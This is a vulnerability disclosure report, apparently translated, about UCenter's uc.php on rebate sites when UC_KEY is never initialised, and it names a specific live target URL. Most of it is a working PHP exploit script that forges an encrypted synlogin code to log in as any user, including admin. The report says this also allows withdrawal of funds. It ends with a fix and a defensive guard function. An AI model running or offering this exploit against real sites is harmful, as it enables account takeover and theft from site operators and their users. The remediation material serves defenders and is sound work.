Brief description: affects many rebate sites; allows login as any user, and even withdrawal of funds.
Vulnerability URL: http://www.bkjia.com/uc.php
When UCenter integration is not enabled in the backend, the typical UC_KEY-uninitialized vulnerability exists.
Because UC_KEY is never initialized, a visitor can call any function of the uc interface at will,
including automatic login (synlogin) and password change.
Proof of vulnerability (PoC):
<?php
print_r('
---------------------------------------
UC_key Uninitialized Vul Exploit
---------------------------------------
');
if ($argc < 2) {
    print_r('
Usage: php '.$argv[0].' username
Username: the admin username
Example: php '.$argv[0].' admin
');
    die();
}
error_reporting(0); // hides the notice raised when the undefined UC_KEY constant is used below
$username = $argv[1];
$key = '';
$code = 'time=11111111111&username='.$username.'&action=synlogin';
$x = urlencode(authcode($code, 'ENCODE', $key));
print_r('plz copy this code ~~ Enjoy it ~~ ^_^
/api/uc.php?code='.$x);

// UCenter's authcode(): an RC4-style stream cipher. The output is a 4-char random
// prefix followed by base64 of (10-digit expiry . 16-char MD5 check value . data).
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key  = md5($key ? $key : UC_KEY);   // falls back to the UC_KEY constant when $key is empty
    $keya = md5(substr($key, 0, 16));    // encryption key
    $keyb = md5(substr($key, 16, 16));   // integrity key
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey   = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box    = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // key scheduling
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // keystream generation, XORed with the input
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        // accept only if not expired and the check value matches
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}
?>
Solution:
Delete uc.php when UCenter integration is not enabled in the backend, or disable it.
There is no problem when the integration is enabled.
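As an added example (not part of the original report or of UCenter's own code), the following guard makes the uc interface fail closed until a real UC_KEY exists, instead of relying on the operator to delete uc.php; the names uc_api_available(), derive_key() and the UC_API_ENABLED switch are assumptions.

```php
<?php
// Added example, not from the original report. uc_api_available(), derive_key()
// and UC_API_ENABLED are assumed names, not UCenter's own.

/**
 * True only when the UCenter integration is switched on AND a usable key exists.
 * $ucEnabled: the backend "enable UCenter" switch; $ucKey: the configured UC_KEY.
 */
function uc_api_available(bool $ucEnabled, ?string $ucKey): bool
{
    if (!$ucEnabled) {
        return false;                    // integration disabled: uc.php must not answer
    }
    if ($ucKey === null || $ucKey === '') {
        return false;                    // key never initialised
    }
    if ($ucKey === 'UC_KEY') {
        return false;                    // PHP 5/7 turn an undefined constant into its own name
    }
    return strlen($ucKey) >= 16;         // UCenter keys are long random strings
}

/**
 * Key derivation that fails closed instead of silently falling back to a
 * constant the way authcode()'s md5($key ? $key : UC_KEY) does.
 */
function derive_key(string $key): string
{
    if ($key === '' || $key === 'UC_KEY') {
        throw new RuntimeException('UC_KEY is not initialised; refusing to derive a cipher key');
    }
    return md5($key);
}

// Guard to run before anything else in api/uc.php:
$ucEnabled = defined('UC_API_ENABLED') && UC_API_ENABLED;  // assumed backend switch
$ucKey     = defined('UC_KEY') ? (string) UC_KEY : null;
if (!uc_api_available($ucEnabled, $ucKey)) {
    header('HTTP/1.1 403 Forbidden');
    exit('UCenter integration is not enabled');
}
```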
Author fadhack